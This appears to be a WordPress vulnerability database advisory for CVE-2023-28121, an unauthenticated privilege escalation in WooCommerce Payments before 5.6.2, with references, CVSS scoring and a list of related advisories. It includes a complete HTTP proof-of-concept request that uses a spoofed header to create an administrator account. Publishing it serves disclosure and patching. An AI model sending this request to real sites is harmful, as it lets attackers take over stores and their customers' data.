WooCommerce Payments < 5.6.2 – Unauthenticated Privilege Escalation | CVE 2023-28121 | Plugin Vulnerabilities

Description

The plugin has a flaw allowing unauthenticated attackers to create an admin account and take over the blog

Proof of Concept

POST /wp-json/wp/v2/users HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Wcpay-Platform-Checkout-User: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json

{
  "username": "attacker",
  "email": "attacker@domain.com",
  "password": "attacker-pwd",
  "roles": ["administrator"]
}

Affects Plugins

woocommerce-payments

Fixed in 5.6.2

References

CVE

URL

https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

mikemyers

Verified

Yes

WPVDB ID

0f78a245-866c-462e-bd23-43dfadb57072

Timeline

Publicly Published

2023-03-23 (about 2 years ago)

Added

2023-03-23 (about 2 years ago)

Last Updated

2023-04-11 (about 2 years ago)

Other

Published

Title

Published

2019-08-09

Title

ND Restaurant Reservations < 1.5 - Unauthenticated Options Change

Published

2025-08-19

Title

CouponXxL <= 3.0.0 - Unauthenticated Privilege Escalation

Published

2024-04-25

Title

WooCommerce Amazon Affiliates < 14.1.0 - Subscriber+ Privilege Escalation

Published

2025-01-16

Title

DD Roles <= 4.1 - Authenticated (Subscriber+) Privilege Escalation

Published

2025-03-04

Title

Homey Login Register <= 2.4.0 - Unauthenticated Privilege Escalation in homey_register